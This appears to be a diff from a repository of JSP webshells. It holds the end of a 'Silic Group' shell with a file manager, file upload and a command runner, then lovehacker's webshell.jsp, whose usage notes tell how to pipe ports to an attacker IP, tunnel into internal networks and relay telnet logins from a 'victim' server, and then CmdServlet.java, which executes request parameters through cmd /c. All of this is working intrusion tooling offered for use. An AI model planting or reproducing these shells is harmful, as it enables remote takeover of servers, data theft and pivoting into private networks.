if(strType.equals("Dir") && !f_new.mkdirs())
sbNewFile.append(strF+" 目录创建失败");
}
else
{
sbNewFile.append("<p><font color=red>建立文件或目录失败</font>");
}
}
if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart")))
{
String tempdir=".";
boolean error=false;
response.setContentType("text/html");
sbNewFile.append("<p><font color=red>建立文件或目录失败</font>");
HttpMultiPartParser parser = new HttpMultiPartParser();
int bstart = request.getContentType().lastIndexOf("oundary=");
String bound = request.getContentType().substring(bstart + 8);
int clength = request.getContentLength();
Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength);
if (ht.get("cqqUploadFile") != null)
{
FileInfo fi = (FileInfo) ht.get("cqqUploadFile");
File f1 = fi.file;
UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
if (info != null && info.aborted)
{
f1.delete();
request.setAttribute("error", "Upload aborted");
}
else
{
String path = (String) ht.get("path");
if(path!=null && !path.endsWith("\\"))
path = path + "\\";
if (!f1.renameTo(new File(path + f1.getName())))
{
request.setAttribute("error", "Cannot upload file.");
error = true;
f1.delete();
}
}
}
}
%>
<html><head>
<style type="text/css">
td,select,input,body{font-size:9pt;}
A { TEXT-DECORATION: none }
#tablist{
padding: 5px 0;
margin-left: 0;
margin-bottom: 0;
margin-top: 0.1em;
font:9pt;
}
#tablist li{
list-style: none;
display: inline;
margin: 0;
}
#tablist li a{
padding: 3px 0.5em;
margin-left: 3px;
border: 1px solid ;
background: F6F6F6;
}
#tablist li a:link, #tablist li a:visited{
color: navy;
}
#tablist li a.current{
background: #EAEAFF;
}
#tabcontentcontainer{
width: 100%;
padding: 5px;
border: 1px solid black;
}
.tabcontent{
display:none;
}
</style>
<script type="text/javascript">
var initialtab=[<%=tabID%>, "menu<%=tabID%>"]
function cascadedstyle(el, cssproperty, csspropertyNS){
if (el.currentStyle)
return el.currentStyle[cssproperty]
else if (window.getComputedStyle){
var elstyle=window.getComputedStyle(el, "")
return elstyle.getPropertyValue(csspropertyNS)
}
}
var previoustab=""
function expandcontent(cid, aobject){
if (document.getElementById){
highlighttab(aobject)
if (previoustab!="")
document.getElementById(previoustab).style.display="none"
document.getElementById(cid).style.display="block"
previoustab=cid
if (aobject.blur)
aobject.blur()
return false
}
else
return true
}
function highlighttab(aobject){
if (typeof tabobjlinks=="undefined")
collecttablinks()
for (i=0; i<tabobjlinks.length; i++)
tabobjlinks[i].style.backgroundColor=initTabcolor
var themecolor=aobject.getAttribute("theme")? aobject.getAttribute("theme") : initTabpostcolor
aobject.style.backgroundColor=document.getElementById("tabcontentcontainer").style.backgroundColor=themecolor
}
function collecttablinks(){
var tabobj=document.getElementById("tablist")
tabobjlinks=tabobj.getElementsByTagName("A")
}
function do_onload(){
collecttablinks()
initTabcolor=cascadedstyle(tabobjlinks[1], "backgroundColor", "background-color")
initTabpostcolor=cascadedstyle(tabobjlinks[0], "backgroundColor", "background-color")
expandcontent(initialtab[1], tabobjlinks[initialtab[0]-1])
}
if (window.addEventListener)
window.addEventListener("load", do_onload, false)
else if (window.attachEvent)
window.attachEvent("onload", do_onload)
else if (document.getElementById)
window.onload=do_onload
</script>
<script language="javascript">
function doForm(action,path,file,cmd,tab,content)
{
document.frmCqq.action.value=action;
document.frmCqq.path.value=path;
document.frmCqq.file.value=file;
document.frmCqq.cmd.value=cmd;
document.frmCqq.tabID.value=tab;
document.frmCqq.content.value=content;
if(action=="del")
{
if(confirm("确定要删除文件 "+file+" 吗?"))
document.frmCqq.submit();
}
else
{
document.frmCqq.submit();
}
}
</script>
<title>::Silic Group::</title>
<head>
<body>
<form name="frmCqq" method="post" action="">
<input type="hidden" name="action" value="">
<input type="hidden" name="path" value="">
<input type="hidden" name="file" value="">
<input type="hidden" name="cmd" value="">
<input type="hidden" name="tabID" value="2">
<input type="hidden" name="content" value="">
</form>
<!--Top Menu Started-->
<ul id="tablist">
<li><a href="http://www.blackbap.com" class="current" onClick="return expandcontent('menu1', this)"> <%=strFileManage[languageNo]%> </a></li>
<li><a href="new.htm" onClick="return expandcontent('menu2', this)" theme="#EAEAFF"> <%=strCommand[languageNo]%> </a></li>
<li><a href="hot.htm" onClick="return expandcontent('menu3', this)" theme="#EAEAFF"> <%=strSysProperty[languageNo]%> </a></li>
<li><a href="search.htm" onClick="return expandcontent('menu4', this)" theme="#EAEAFF"> <%=strHelp[languageNo]%> </a></li>
&nbsp; <%=authorInfo[languageNo]%>
</ul>
<!--Top Menu End-->
<%
StringBuffer sbFolder=new StringBuffer("");
StringBuffer sbFile=new StringBuffer("");
try
{
File objFile = new File(strDir);
File list[] = objFile.listFiles();
if(objFile.getAbsolutePath().length()>3)
{
sbFolder.append("<tr><td >&nbsp;</td><td><a href=\"javascript:doForm('','"+formatPath(objFile.getParentFile().getAbsolutePath())+"','','"+strCmd+"','1','');\">");
sbFolder.append(strParentFolder[languageNo]+"</a><br>- - - - - - - - - - - </td></tr>\r\n ");
}
for(int i=0;i<list.length;i++)
{
if(list[i].isDirectory())
{
sbFolder.append("<tr><td >&nbsp;</td><td>");
sbFolder.append(" <a href=\"javascript:doForm('','"+formatPath(list[i].getAbsolutePath())+"','','"+strCmd+"','1','');\">");
sbFolder.append(list[i].getName()+"</a><br></td></tr> ");
}
else
{
String strLen="";
String strDT="";
long lFile=0;
lFile=list[i].length();
strLen = convertFileSize(lFile);
Date dt=new Date(list[i].lastModified());
strDT=dt.toLocaleString();
sbFile.append("<tr onmouseover=\"this.style.backgroundColor='#FBFFC6'\" onmouseout=\"this.style.backgroundColor='white'\"><td>");
sbFile.append(""+list[i].getName());
sbFile.append("</td><td>");
sbFile.append(""+strLen);
sbFile.append("</td><td>");
sbFile.append(""+strDT);
sbFile.append("</td><td>");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('edit','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileEdit[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('del','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileDel[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('down','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileDown[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('copy','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileCopy[languageNo]+"</a> ");
}
}
}
catch(Exception e)
{
out.println("<font color=red>操作失败: "+e.toString()+"</font>");
}
%>
<DIV id="tabcontentcontainer">
<div id="menu3" class="tabcontent">
null
</div>
<div id="menu4" class="tabcontent">
<br><p>说明</p><p>Recoding by Juliet From:<a href="http://blackbap.org">Silic Group Inc.</a></p>
</div>
<div id="menu1" class="tabcontent">
<%
out.println("<table border='1' width='100%' bgcolor='#FBFFC6' cellspacing=0 cellpadding=5 bordercolorlight=#000000 bordercolordark=#FFFFFF><tr><td width='30%'>"+strCurrentFolder[languageNo]+" <b>"+strDir+"</b></td><td>" + getDrivers() + "</td></tr></table><br>\r\n");
%>
<table width="100%" border="1" cellspacing="0" cellpadding="5" bordercolorlight="#000000" bordercolordark="#FFFFFF"><tr><td width="25%" align="center" valign="top"><table width="98%" border="0" cellspacing="0" cellpadding="3"><%=sbFolder%></tr></table></td><td width="81%" align="left" valign="top">
<%
if(strAction!=null && strAction.equals("edit"))
{
out.println(sbEdit.toString());
}
else if(strAction!=null && strAction.equals("copy"))
{
out.println(sbCopy.toString());
}
else if(strAction!=null && strAction.equals("down"))
{
out.println(sbDown.toString());
}
else if(strAction!=null && strAction.equals("savecopy"))
{
out.println(sbSaveCopy.toString());
}
else if(strAction!=null && strAction.equals("newFile") && !sbNewFile.toString().equals(""))
{
out.println(sbNewFile.toString());
}
else
{
%>
<span id="EditBox"><table width="98%" border="1" cellspacing="1" cellpadding="4" bordercolorlight="#cccccc" bordercolordark="#FFFFFF" bgcolor="white" >
<tr bgcolor="#E7e7e6">
<td width="26%"><%=strFileName[languageNo]%></td>
<td width="19%"><%=strFileSize[languageNo]%></td>
<td width="29%"><%=strLastModified[languageNo]%></td>
<td width="26%"><%=strFileOperation[languageNo]%></td>
</tr>
<%=sbFile%>
</table></span>
<%
}
%></td></tr>
<form name="frmMake" action="" method="post">
<tr><td colspan=2 bgcolor=#FBFFC6>
<input type="hidden" name="action" value="newFile">
<input type="hidden" name="path" value="<%=strDir%>">
<input type="hidden" name="file" value="<%=strFile%>">
<input type="hidden" name="cmd" value="<%=strCmd%>">
<input type="hidden" name="tabID" value="1">
<input type="hidden" name="content" value="">
<%
if(!strDir.endsWith("\\"))
strDir = strDir + "\\";
%>
<input type="text" name="fileName" size=36 value="<%=strDir%>">
<input type="submit" name="btnNewFile" value="新建文件" onclick="frmMake.submit()" >
<input type="submit" name="btnNewDir" value="新建目录" onclick="frmMake.submit()" >
</form>
<form name="frmUpload" enctype="multipart/form-data" action="" method="post">
<input type="hidden" name="action" value="upload">
<input type="hidden" name="path" value="<%=strDir%>">
<input type="hidden" name="file" value="<%=strFile%>">
<input type="hidden" name="cmd" value="<%=strCmd%>">
<input type="hidden" name="tabID" value="1">
<input type="hidden" name="content" value="">
<input type="file" name="cqqUploadFile" size="36">
<input type="submit" name="submit" value="上传">
</td></tr></form>
</table>
</div>
<div id="menu2" class="tabcontent">
<%
String line="";
StringBuffer sbCmd=new StringBuffer("");
if(strCmd!=null)
{
try
{
//out.println(strCmd);
Process p=Runtime.getRuntime().exec("cmd /c "+strCmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null)
{
sbCmd.append(line+"\r\n");
}
}
catch(Exception e)
{
System.out.println(e.toString());
}
}
else
{
strCmd = "set";
}
%>
<form name="cmd" action="" method="post">
&nbsp;
<input type="text" name="cmd" value="<%=strCmd%>" size=50>
<input type="hidden" name="tabID" value="2">
<input type=submit name=submit value="<%=strExecute[languageNo]%>">
</form>
<%
if(sbCmd!=null && sbCmd.toString().trim().equals("")==false)
{
%>
&nbsp;<TEXTAREA NAME="cqq" ROWS="20" COLS="100%"><%=sbCmd.toString()%></TEXTAREA>
<br>&nbsp;
<%
}
%>
</DIV></div>
<center>All Rights Reserved, <a href="http://blackbap.org" target="_blank">blackbap.org</a> &copy; Silic Group Inc.</center>

814
jsp/hackk8/fuck-jsp/spjspshell.jsp Normal file
View file

@ -0,0 +1,814 @@
<%
/*
* WEBSHELL.JSP
*
* Author: lovehacker
* E-mail: wangyun188@hotmail.com
*
* 使用方法:
* ]http://victim/webshell.jsp?[options]
* options:
* action=piped&remoteHost=&remotePort=&myIp=&myPort=
* action=tunnel&remoteHost=&remotePort=&myPort=
* action=login&username=&password=&myPort=
* action=send&myShell=&myPort=&cmd=
* action=close&myPort=
* action=shell&cmd=
* 例子:
* action=piped&remoteHost=192.168.0.1&remotePort=25&myIp=218.0.0.1&myPort=12345 -- 将192.168.0.1的25端口与218.0.0.1的12345端口连接起来可以先用NC监听12345端口。适用于你无法直接访问已控制的WEB服务器的内网里某机器的某端口而防火墙又未过滤该WEB服务器向外的连接。
* action=tunnel&remoteHost=192.168.0.1&remotePort=23&myPort=65534 -- 实现通过访问该webshell.jsp访问内网某主机telnet服务的功能。原本想实现通过访问webshell.jsp实现对内网任意服务访问的功能但jsp功能有限实现起来较为复杂适用于你控制的机器只开了80端口并且防火墙不允许它访问Internet而你又非常想访问它内网某主机的Telnet服务:-)
* action=login&username=root&password=helloroot&myPort=65534 -- 上一步只是告诉了要Telnet那台机器这一步才开始真正登陆你要输入要telnet主机的正确的用户名密码才行喔要不然谁也没办法。
* action=send&myShell=&myPort=&cmd= -- 上一步如果顺利完成那么你就可以在上边执行你想执行的命令了。myShell这个参数是结束标记否则无法知道数据流什么时间该结束一定要写对喔否则嘿嘿就麻烦罗。cmd这个参数就是你要执行的命令了比如“which ssh”建议你这样玩myShell=lovehacker&cmd=ls -la;echo lovehacker。
* action=close&myPort= -- 你是退出了telnet登陆但程序在主机上开放的端口还没关闭所以你要再执行这个命令现场打扫干净嘛。
* action=shell&cmd= -- 在你控制的这台机器上执行命令。Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\winnt\system32\cmd.exe /c type c:\winnt\win.ini
* 程序说明:
* 想通过jsp实现telnet代理的时候着实头痛了一把每个请求都是一个新的线程client socket去连接
* telnet服务只能批量命令无法实现与用户的交互后来想了个笨办法把telnet的过程分步完成
* 收到tunnel命令后先起两个线程一个监听端口等待连接一个先和远程服务器建立好端口连接并一
* 直不断开这下server socket再一次一次的收数据一次次的转发到远程服务器就可以记录状态
* 现和用户的交互了但总觉得这办法太笨如果用JSP实现telnet代理功能你有更好的办法的话请一定
* 要来信告诉我。
* 版权说明:
* 本身实现Telnet的功能我也是在人家代码的基础上修改的所以版权没有你可以任意修改、复制。
* 只是加了新功能别忘了Mail一份给我喔
*
*
*/
%>
<%@ page import="java.io.*" %>
<%@ page import="java.net.*" %>
<%@ page import="java.util.*" %>
<%@ page import="java.awt.Dimension" %>
<%
class redirector implements Runnable
{
private redirector companion = null;
private Socket localSocket, remoteSocket;
private InputStream from;
private OutputStream to;
private byte[] buffer = new byte[4096];
public redirector(Socket local, Socket remote)
{
try {
localSocket = local;
remoteSocket = remote;
from = localSocket.getInputStream();
to = remoteSocket.getOutputStream();
} catch(Exception e) {}
}
public void couple(redirector c) {
companion = c;
Thread listen = new Thread(this);
listen.start();
}
public void decouple() { companion = null; }
public void run()
{
int count;
try {
while(companion != null) {
if((count = from.read(buffer)) < 0)
break;
to.write(buffer, 0, count);
}
} catch(Exception e) {}
try {
from.close();
to.close();
localSocket.close();
remoteSocket.close();
if(companion != null) companion.decouple();
} catch(Exception io) {}
}
}
class redirector1 implements Runnable
{
private redirector1 companion = null;
private Socket localSocket, remoteSocket;
private InputStream from;
private OutputStream to;
private byte[] buffer = new byte[4096];
public redirector1(Socket local, Socket remote)
{
try {
localSocket = local;
remoteSocket = remote;
from = localSocket.getInputStream();
to = remoteSocket.getOutputStream();
} catch(Exception e) {}
}
public void couple(redirector1 c) {
companion = c;
Thread listen = new Thread(this);
listen.start();
}
public void decouple() { companion = null; }
public void run()
{
String tmp = "";
int count;
try {
while(companion != null) {
if((count = from.read(buffer)) < 0) break;
tmp = new String(buffer);
if(tmp.startsWith("--GoodBye--"))
{
from.close();
to.close();
remoteSocket.close();
localSocket.close();
System.exit(1);
}
to.write(buffer, 0, count);
}
} catch(Exception e) {}
try {
if(companion != null) companion.decouple();
} catch(Exception io) {}
}
}
class piped implements Runnable
{
String remoteHost1,remoteHost2;
int remotePort1, remotePort2;
Thread listener, connection;
public piped(String raddr1,int rport1, String raddr2, int rport2)
{
remoteHost1 = raddr1; remotePort1 = rport1;
remoteHost2 = raddr2; remotePort2 = rport2;
listener = new Thread(this);
listener.setPriority(Thread.MIN_PRIORITY);
listener.start();
}
public void run()
{
Socket destinationSocket1 = null;
Socket destinationSocket2 = null;
try {
destinationSocket1 = new Socket(remoteHost1,remotePort1);
destinationSocket2 = new Socket(remoteHost2, remotePort2);
redirector r1 = new redirector(destinationSocket1, destinationSocket2);
redirector r2 = new redirector(destinationSocket2, destinationSocket1);
r1.couple(r2);
r2.couple(r1);
} catch(Exception e) {
try {
DataOutputStream os = new DataOutputStream(destinationSocket2.getOutputStream());
os.writeChars("Remote host refused connection.\n");
destinationSocket2.close();
} catch(IOException ioe) { }
}
}
}
class tunnel implements Runnable
{
String remoteHost;
int localPort, remotePort;
Thread listener, connection;
ServerSocket server;
public tunnel(int lport, String raddr, int rport)
{
localPort = lport;
remoteHost = raddr; remotePort = rport;
try {
server = new ServerSocket(localPort);
} catch(Exception e) {}
listener = new Thread(this);
listener.setPriority(Thread.MIN_PRIORITY);
listener.start();
}
public void run()
{
Socket destinationSocket = null;
try{
destinationSocket = new Socket(remoteHost, remotePort);
}catch(Exception e){}
while(true)
{
Socket localSocket = null;
try {
localSocket = server.accept();
} catch(Exception e) {
continue;
}
try {
redirector1 r1 = new redirector1(localSocket, destinationSocket);
redirector1 r2 = new redirector1(destinationSocket, localSocket);
r1.couple(r2);
r2.couple(r1);
} catch(Exception e) {
try {
DataOutputStream os = new DataOutputStream(localSocket.getOutputStream());
os.writeChars("Remote host refused connection.\n");
localSocket.close();
} catch(IOException ioe) {}
continue;
}
}
}
}
class TelnetIO
{
public String toString() { return "$Id: TelnetIO.java,v 1.10 1998/02/09 10:22:18 leo Exp $"; }
private int debug = 0;
private byte neg_state = 0;
private final static byte STATE_DATA = 0;
private final static byte STATE_IAC = 1;
private final static byte STATE_IACSB = 2;
private final static byte STATE_IACWILL = 3;
private final static byte STATE_IACDO = 4;
private final static byte STATE_IACWONT = 5;
private final static byte STATE_IACDONT = 6;
private final static byte STATE_IACSBIAC = 7;
private final static byte STATE_IACSBDATA = 8;
private final static byte STATE_IACSBDATAIAC = 9;
private byte current_sb;
private final static byte IAC = (byte)255;
private final static byte EOR = (byte)239;
private final static byte WILL = (byte)251;
private final static byte WONT = (byte)252;
private final static byte DO = (byte)253;
private final static byte DONT = (byte)254;
private final static byte SB = (byte)250;
private final static byte SE = (byte)240;
private final static byte TELOPT_ECHO = (byte)1; /* echo on/off */
private final static byte TELOPT_EOR = (byte)25; /* end of record */
private final static byte TELOPT_NAWS = (byte)31; /* NA-WindowSize*/
private final static byte TELOPT_TTYPE = (byte)24; /* terminal type */
private final byte[] IACWILL = { IAC, WILL };
private final byte[] IACWONT = { IAC, WONT };
private final byte[] IACDO = { IAC, DO };
private final byte[] IACDONT = { IAC, DONT };
private final byte[] IACSB = { IAC, SB };
private final byte[] IACSE = { IAC, SE };
private final byte TELQUAL_IS = (byte)0;
private final byte TELQUAL_SEND = (byte)1;
private byte[] receivedDX;
private byte[] receivedWX;
private byte[] sentDX;
private byte[] sentWX;
private Socket socket;
private BufferedInputStream is;
private BufferedOutputStream os;
//private StatusPeer peer = this; /* peer, notified on status */
public void connect(String address, int port) throws IOException {
if(debug > 0) System.out.println("Telnet.connect("+address+","+port+")");
socket = new Socket(address, port);
is = new BufferedInputStream(socket.getInputStream());
os = new BufferedOutputStream(socket.getOutputStream());
neg_state = 0;
receivedDX = new byte[256];
sentDX = new byte[256];
receivedWX = new byte[256];
sentWX = new byte[256];
}
public void disconnect() throws IOException {
if(debug > 0) System.out.println("TelnetIO.disconnect()");
if(socket !=null) socket.close();
}
public void connect(String address) throws IOException {
connect(address, 23);
}
//public void setPeer(StatusPeer obj) { peer = obj; }
public int available() throws IOException
{
return is.available();
}
public byte[] receive() throws IOException {
int count = is.available();
byte buf[] = new byte[count];
count = is.read(buf);
if(count < 0) throw new IOException("Connection closed.");
if(debug > 1) System.out.println("TelnetIO.receive(): read bytes: "+count);
buf = negotiate(buf, count);
return buf;
}
public void send(byte[] buf) throws IOException {
if(debug > 1) System.out.println("TelnetIO.send("+buf+")");
os.write(buf);
os.flush();
}
public void send(byte b) throws IOException {
if(debug > 1) System.out.println("TelnetIO.send("+b+")");
os.write(b);
os.flush();
}
private void handle_sb(byte type, byte[] sbdata, int sbcount)
throws IOException
{
if(debug > 1)
System.out.println("TelnetIO.handle_sb("+type+")");
switch (type) {
case TELOPT_TTYPE:
if (sbcount>0 && sbdata[0]==TELQUAL_SEND) {
String ttype;
send(IACSB);send(TELOPT_TTYPE);send(TELQUAL_IS);
/* FIXME: need more logic here if we use
* more than one terminal type
*/
Vector vec = new Vector(2);
vec.addElement("TTYPE");
ttype = (String)notifyStatus(vec);
if(ttype == null) ttype = "dumb";
byte[] bttype = new byte[ttype.length()];
ttype.getBytes(0,ttype.length(), bttype, 0);
send(bttype);
send(IACSE);
}
}
}
public Object notifyStatus(Vector status) {
if(debug > 0)
System.out.println("TelnetIO.notifyStatus("+status+")");
return null;
}
private byte[] negotiate(byte buf[], int count) throws IOException {
if(debug > 1)
System.out.println("TelnetIO.negotiate("+buf+","+count+")");
byte nbuf[] = new byte[count];
byte sbbuf[] = new byte[count];
byte sendbuf[] = new byte[3];
byte b,reply;
int sbcount = 0;
int boffset = 0, noffset = 0;
Vector vec = new Vector(2);
while(boffset < count) {
b=buf[boffset++];
if (b>=128)
b=(byte)((int)b-256);
switch (neg_state) {
case STATE_DATA:
if (b==IAC) {
neg_state = STATE_IAC;
} else {
nbuf[noffset++]=b;
}
break;
case STATE_IAC:
switch (b) {
case IAC:
if(debug > 2)
System.out.print("IAC ");
neg_state = STATE_DATA;
nbuf[noffset++]=IAC;
break;
case WILL:
if(debug > 2)
System.out.print("WILL ");
neg_state = STATE_IACWILL;
break;
case WONT:
if(debug > 2)
System.out.print("WONT ");
neg_state = STATE_IACWONT;
break;
case DONT:
if(debug > 2)
System.out.print("DONT ");
neg_state = STATE_IACDONT;
break;
case DO:
if(debug > 2)
System.out.print("DO ");
neg_state = STATE_IACDO;
break;
case EOR:
if(debug > 2)
System.out.print("EOR ");
neg_state = STATE_DATA;
break;
case SB:
if(debug > 2)
System.out.print("SB ");
neg_state = STATE_IACSB;
sbcount = 0;
break;
default:
if(debug > 2)
System.out.print(
"<UNKNOWN "+b+" > "
);
neg_state = STATE_DATA;
break;
}
break;
case STATE_IACWILL:
switch(b) {
case TELOPT_ECHO:
if(debug > 2)
System.out.println("ECHO");
reply = DO;
vec = new Vector(2);
vec.addElement("NOLOCALECHO");
notifyStatus(vec);
break;
case TELOPT_EOR:
if(debug > 2)
System.out.println("EOR");
reply = DO;
break;
default:
if(debug > 2)
System.out.println(
"<UNKNOWN,"+b+">"
);
reply = DONT;
break;
}
if(debug > 1)
System.out.println("<"+b+", WILL ="+WILL+">");
if ( reply != sentDX[b+128] ||
WILL != receivedWX[b+128]
) {
sendbuf[0]=IAC;
sendbuf[1]=reply;
sendbuf[2]=b;
send(sendbuf);
sentDX[b+128] = reply;
receivedWX[b+128] = WILL;
}
neg_state = STATE_DATA;
break;
case STATE_IACWONT:
switch(b) {
case TELOPT_ECHO:
if(debug > 2)
System.out.println("ECHO");
vec = new Vector(2);
vec.addElement("LOCALECHO");
notifyStatus(vec);
reply = DONT;
break;
case TELOPT_EOR:
if(debug > 2)
System.out.println("EOR");
reply = DONT;
break;
default:
if(debug > 2)
System.out.println(
"<UNKNOWN,"+b+">"
);
reply = DONT;
break;
}
if ( reply != sentDX[b+128] ||
WONT != receivedWX[b+128]
) {
sendbuf[0]=IAC;
sendbuf[1]=reply;
sendbuf[2]=b;
send(sendbuf);
sentDX[b+128] = reply;
receivedWX[b+128] = WILL;
}
neg_state = STATE_DATA;
break;
case STATE_IACDO:
switch (b) {
case TELOPT_ECHO:
if(debug > 2)
System.out.println("ECHO");
reply = WILL;
vec = new Vector(2);
vec.addElement("LOCALECHO");
notifyStatus(vec);
break;
case TELOPT_TTYPE:
if(debug > 2)
System.out.println("TTYPE");
reply = WILL;
break;
case TELOPT_NAWS:
if(debug > 2)
System.out.println("NAWS");
vec = new Vector(2);
vec.addElement("NAWS");
Dimension size = (Dimension)
notifyStatus(vec);
receivedDX[b] = DO;
if(size == null)
{
/* this shouldn't happen */
send(IAC);
send(WONT);
send(TELOPT_NAWS);
reply = WONT;
sentWX[b] = WONT;
break;
}
reply = WILL;
sentWX[b] = WILL;
sendbuf[0]=IAC;
sendbuf[1]=WILL;
sendbuf[2]=TELOPT_NAWS;
send(sendbuf);
send(IAC);send(SB);send(TELOPT_NAWS);
send((byte) (size.width >> 8));
send((byte) (size.width & 0xff));
send((byte) (size.height >> 8));
send((byte) (size.height & 0xff));
send(IAC);send(SE);
break;
default:
if(debug > 2)
System.out.println(
"<UNKNOWN,"+b+">"
);
reply = WONT;
break;
}
if ( reply != sentWX[128+b] ||
DO != receivedDX[128+b]
) {
sendbuf[0]=IAC;
sendbuf[1]=reply;
sendbuf[2]=b;
send(sendbuf);
sentWX[b+128] = reply;
receivedDX[b+128] = DO;
}
neg_state = STATE_DATA;
break;
case STATE_IACDONT:
switch (b) {
case TELOPT_ECHO:
if(debug > 2)
System.out.println("ECHO");
reply = WONT;
vec = new Vector(2);
vec.addElement("NOLOCALECHO");
notifyStatus(vec);
break;
case TELOPT_NAWS:
if(debug > 2)
System.out.println("NAWS");
reply = WONT;
break;
default:
if(debug > 2)
System.out.println(
"<UNKNOWN,"+b+">"
);
reply = WONT;
break;
}
if ( reply != sentWX[b+128] ||
DONT != receivedDX[b+128]
) {
send(IAC);send(reply);send(b);
sentWX[b+128] = reply;
receivedDX[b+128] = DONT;
}
neg_state = STATE_DATA;
break;
case STATE_IACSBIAC:
if(debug > 2) System.out.println(""+b+" ");
if (b == IAC) {
sbcount = 0;
current_sb = b;
neg_state = STATE_IACSBDATA;
} else {
System.out.println("(bad) "+b+" ");
neg_state = STATE_DATA;
}
break;
case STATE_IACSB:
if(debug > 2) System.out.println(""+b+" ");
switch (b) {
case IAC:
neg_state = STATE_IACSBIAC;
break;
default:
current_sb = b;
sbcount = 0;
neg_state = STATE_IACSBDATA;
break;
}
break;
case STATE_IACSBDATA:
if (debug > 2) System.out.println(""+b+" ");
switch (b) {
case IAC:
neg_state = STATE_IACSBDATAIAC;
break;
default:
sbbuf[sbcount++] = b;
break;
}
break;
case STATE_IACSBDATAIAC:
if (debug > 2) System.out.println(""+b+" ");
switch (b) {
case IAC:
neg_state = STATE_IACSBDATA;
sbbuf[sbcount++] = IAC;
break;
case SE:
handle_sb(current_sb,sbbuf,sbcount);
current_sb = 0;
neg_state = STATE_DATA;
break;
case SB:
handle_sb(current_sb,sbbuf,sbcount);
neg_state = STATE_IACSB;
break;
default:
neg_state = STATE_DATA;
break;
}
break;
default:
if (debug > 2)
System.out.println(
"This should not happen: "+
neg_state+" "
);
neg_state = STATE_DATA;
break;
}
}
buf = new byte[noffset];
System.arraycopy(nbuf, 0, buf, 0, noffset);
return buf;
}
}
class TelnetConnect
{
TelnetIO tio = new TelnetIO();
int port = 0;
public TelnetConnect(int port)
{
this.port = port;
}
public void connect()
{
try {
tio.connect("localhost",port);
} catch(IOException e) {}
}
public void disconnect()
{
try{
tio.disconnect();
}catch(IOException e){}
}
private String wait(String prompt)
{
String tmp = "";
do {
try {
tmp += new String(tio.receive(), 0);
}catch(IOException e) {}
} while(tmp.indexOf(prompt) == -1);
return tmp;
}
private byte[] receive()
{
byte[] temp = null;
try{
temp = tio.receive();
}catch(IOException e){}
return temp;
}
private String waitshell()
{
String tmp = "";
do {
try { tmp += new String(tio.receive(), 0); }
catch(IOException e) {}
} while((tmp.indexOf("$") == -1)&&(tmp.indexOf("#") == -1)&&(tmp.indexOf("%") == -1));
return tmp;
}
private void send(String str)
{
byte[] buf = new byte[str.length()];
str.getBytes(0, str.length(), buf, 0);
try { tio.send(buf); } catch(IOException e) {}
}
}
%>
<%
String action = request.getParameter("action");
String cmd = request.getParameter("cmd");
String remoteHost = request.getParameter("remoteHost");
String myIp = request.getParameter("myIp");
String myPort = request.getParameter("myPort");
String remotePort = request.getParameter("remotePort");
String username = request.getParameter("username");
String password = request.getParameter("password");
String myShell = request.getParameter("myShell");
if(action.equals("shell")){
try {
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) { out.print((char)c); }
in.close();
try { child.waitFor();} catch (InterruptedException e) {}
} catch (IOException e) {}
}else if(action.equals("piped")){
piped me = new piped(remoteHost,Integer.parseInt(remotePort),myIp,Integer.parseInt(myPort));
}else if(action.equals("tunnel")){
tunnel me = new tunnel(Integer.parseInt(myPort),
remoteHost, Integer.parseInt(remotePort));
}else if(action.equals("login")){
TelnetConnect tc = new TelnetConnect(Integer.parseInt(myPort));
tc.connect();
out.print(tc.wait("login:"));
tc.send(username+"\r");
out.print(tc.wait("Password:"));
tc.send(password+"\r");
out.print(tc.waitshell());
tc.disconnect();
}else if(action.equals("send")){
TelnetConnect tc = new TelnetConnect(Integer.parseInt(myPort));
tc.connect();
tc.send(cmd+"\r");
if(!myShell.equals("logout"))
out.print(tc.wait(myShell));
tc.disconnect();
}else if(action.equals("close")){
try{
Socket s = new Socket("127.0.0.1",Integer.parseInt(myPort));
DataOutputStream dos = new DataOutputStream(s.getOutputStream());
PrintStream ps = new PrintStream(dos);
ps.println("--GoodBye--");
ps.close();
dos.close();
s.close();
}catch(Exception e){}
}else{
out.print("<Font color=black size=7>You Love Hacker Too?");
}
%>

BIN
jsp/hackk8/jsp_77/CmdServlet.class Normal file
View file

Binary file not shown.

43
jsp/hackk8/jsp_77/CmdServlet.java Normal file
View file

@ -0,0 +1,43 @@
/*
* CmdServlet.java 20/01/2004
*
* @author The Dark Raver
* @version 0.1
*/
import java.io.*;
import javax.servlet.*;
import javax.servlet.http.*;
public class CmdServlet extends HttpServlet {
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
res.setContentType("text/html");
PrintWriter out = res.getWriter();
out.print("<html><body>");
out.print("<hr><p><form method=\"GET\" name=\"myform\" action=\"\">");
out.print("<input type=\"text\" name=\"cmd\">");
out.print("<input type=\"submit\" value=\"Send\">");
out.print("</form>");
if(req.getParameter("cmd") != null) {
out.print("\n<hr><p><b>Command: " + req.getParameter("cmd") + "\n</b><br><br><hr><pre>\n");
Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
DataInputStream procIn = new DataInputStream(p.getInputStream());
int c='\0';
while ((c=procIn.read()) != -1) {
out.print((char)c);
}
}
out.print("\n<hr></pre>");
out.print("</body></html>");
}
public String getServletInfo() {
return "CmdServlet 0.1";
}
}

BIN
jsp/hackk8/jsp_77/ListServlet.class Normal file
View file

Binary file not shown.

86
jsp/hackk8/jsp_77/ListServlet.java Normal file
View file

@ -0,0 +1,86 @@
